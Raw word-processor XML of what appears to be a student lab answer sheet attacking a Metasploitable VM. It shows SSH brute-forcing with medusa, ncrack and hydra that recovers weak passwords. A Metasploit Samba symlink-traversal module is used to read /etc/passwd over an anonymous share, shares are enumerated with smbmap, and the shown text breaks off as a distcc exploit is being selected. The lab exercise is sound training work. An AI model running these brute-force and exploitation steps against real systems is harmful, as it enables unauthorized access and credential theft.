        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# medusa -u msfadmin -P /usr/share/dirb/wordlists//common.txt -h 10.0.2.4 -M ssh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks &lt;jmk@foofus.net&gt;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[...]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ACCOUNT CHECK: [ssh] Host: 10.0.2.4 (1 of 1, 0 complete) User: msfadmin (1 of 1, 0 complete) Password: msfadmin (2421 of 4622 complete)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ACCOUNT FOUND: [ssh] Host: 10.0.2.4 User: msfadmin Password: msfadmin [SUCCESS]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Rule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ncrack: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br w:type="textWrapping"/>
        <w:t xml:space="preserve">﻿</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# ncrack -v -p 22 --user user -P /usr/share/dirb/wordlists//common.txt  10.0.2.4 </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Starting Ncrack 0.5 ( http://ncrack.org ) at 2017-02-20 06:01 MST</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Discovered credentials on ssh://10.0.2.4:22 'user' 'user'</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">﻿</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/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Ncrack done: 1 service scanned in 30.01 seconds.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/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br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# hydra -l user -P /usr/share/dirb/wordlists//common.txt 10.0.2.4 ssh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Hydra (http://www.thc.org/thc-hydra) starting at 2017-02-20 06:07:11</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[DATA] max 16 tasks per 1 server, overall 64 tasks, 4622 login tries (l:1/p:4622), ~4 tries per task</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[DATA] attacking service ssh on port 22</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">22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][</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh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] host: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.4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  login: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user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  password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user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br w:type="textWrapping"/>
        <w:t xml:space="preserve">[STATUS] attack finished for 10.0.2.4 (waiting for children to finish) ...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">1 of 1 target successfully completed, 1 valid password found</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Hydra (http://www.thc.org/thc-hydra) finished at 2017-02-20 06:07:30</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/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b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5) Some shares had a $ in them.  Which shares are these, and what does each do.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These are hidden shares. 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ADMIN$ - The windows directory or Systemroot default directory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IPC$ - InterProcess Communication(IPC) Allows applications to share information and handle many requests at once. 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PRINT$ - Enables remote administration on printers.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Bonus Questions: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1) One of the shares has a 'oh noes' in the comments.  What is special about this share and why might the metasploitable authors call it out.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﻿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color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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&gt; use auxiliary/admin/smb/samba_symlink_traversal </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">samba_symlink_traversal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) &gt; set rhost 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">rhost =&gt; 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">samba_symlink_traversal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) &gt; set smbshare tmp</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">smbshare =&gt; tmp</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">samba_symlink_traversal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) &gt; exploit</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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10.0.2.4:445 - Connecting to the server...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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10.0.2.4:445 - Trying to mount writeable share 'tmp'...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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10.0.2.4:445 - Trying to link 'rootfs' to the root filesystem...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-]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10.0.2.4:445 - Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_NAME_COLLISION (Command=50 WordCount=0)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-]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10.0.2.4:445 - Call stack:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-]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10.0.2.4:445 -   /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:259:in `smb_recv_parse'</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-]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10.0.2.4:445 -   /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:1666:in `trans2'</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-]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10.0.2.4:445 -   /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:1787:in `symlink'</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-]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10.0.2.4:445 -   /usr/share/metasploit-framework/modules/auxiliary/admin/smb/samba_symlink_traversal.rb:60:in `run'</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Auxiliary module execution completed</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">samba_symlink_traversal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) &gt; exit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b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# smbclient //10.0.2.4/tmp -N</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">WARNING: The "syslog" option is deprecated</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Anonymous login successful</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">smb: \&gt; cd rootfs\etc\</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">smb: \rootfs\etc\&gt; more passwd </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">﻿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root:x:0:0:root:/root:/bin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">daemon:x:1:1:daemon:/usr/sbin:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">bin:x:2:2:bin:/bin:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">sys:x:3:3:sys:/dev:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">sync:x:4:65534:sync:/bin:/bin/sync</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">games:x:5:60:games:/usr/games:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">man:x:6:12:man:/var/cache/man:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">lp:x:7:7:lp:/var/spool/lpd:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">mail:x:8:8:mail:/var/mail:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">news:x:9:9:news:/var/spool/news:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">proxy:x:13:13:proxy:/bin:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">www-data:x:33:33:www-data:/var/www:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">backup:x:34:34:backup:/var/backups:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">list:x:38:38:Mailing List Manager:/var/list:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">irc:x:39:39:ircd:/var/run/ircd:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">nobody:x:65534:65534:nobody:/nonexistent:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">libuuid:x:100:101::/var/lib/libuuid:/bin/sh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">dhcp:x:101:102::/nonexistent:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">syslog:x:102:103::/home/syslog:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">klog:x:103:104::/home/klog:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">bind:x:105:113::/var/cache/bind:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">postfix:x:106:115::/var/spool/postfix:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ftp:x:107:65534::/home/ftp:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">distccd:x:111:65534::/:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:x:1001:1001:just a user,111,,:/home/user:/bin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">service:x:1002:1002:,,,:/home/service:/bin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">telnetd:x:112:120::/nonexistent:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">proftpd:x:113:65534::/var/run/proftpd:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">statd:x:114:65534::/var/lib/nfs:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">snmp:x:115:65534::/var/lib/snmp:/bin/false</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ffffff"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(END)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br w:type="textWrapping"/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﻿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b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# smbmap -u user -p user -d workgroup -H 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Finding open SMB ports....</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] User SMB session establishd on 10.0.2.4...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] IP: 10.0.2.4:445</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: 10.0.2.4                                          </w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Disk                                                  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Permissions</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">----                                                  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">-----------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">print$                                            </w:t>
        <w:tab/>
        <w:t xml:space="preserve">READ ONLY</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">tmp                                               </w:t>
        <w:tab/>
        <w:t xml:space="preserve">READ, WRITE</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">opt                                               </w:t>
        <w:tab/>
        <w:t xml:space="preserve">READ ONLY</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">IPC$                                              </w:t>
        <w:tab/>
        <w:t xml:space="preserve">NO ACCESS</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">ADMIN$                                            </w:t>
        <w:tab/>
        <w:t xml:space="preserve">NO ACCESS</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">user                                              </w:t>
        <w:tab/>
        <w:t xml:space="preserve">READ, WRITE</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# smbmap -u msfadmin -p msfadmin -d workgroup -H 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Finding open SMB ports....</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] User SMB session establishd on 10.0.2.4...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] IP: 10.0.2.4:445</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: 10.0.2.4                                          </w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Disk                                                  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Permissions</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">----                                                  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">-----------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">print$                                            </w:t>
        <w:tab/>
        <w:t xml:space="preserve">READ ONLY</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">tmp                                               </w:t>
        <w:tab/>
        <w:t xml:space="preserve">READ, WRITE</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">opt                                               </w:t>
        <w:tab/>
        <w:t xml:space="preserve">READ ONLY</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">IPC$                                              </w:t>
        <w:tab/>
        <w:t xml:space="preserve">NO ACCESS</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">ADMIN$                                            </w:t>
        <w:tab/>
        <w:t xml:space="preserve">NO ACCESS</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">msfadmin                                          </w:t>
        <w:tab/>
        <w:t xml:space="preserve">READ, WRITE</w:t>
        <w:br w:type="textWrapping"/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2) What exploit works for that SMB share?  What does that exploit do?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color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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&gt; use exploit/unix/misc/distcc_exec </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
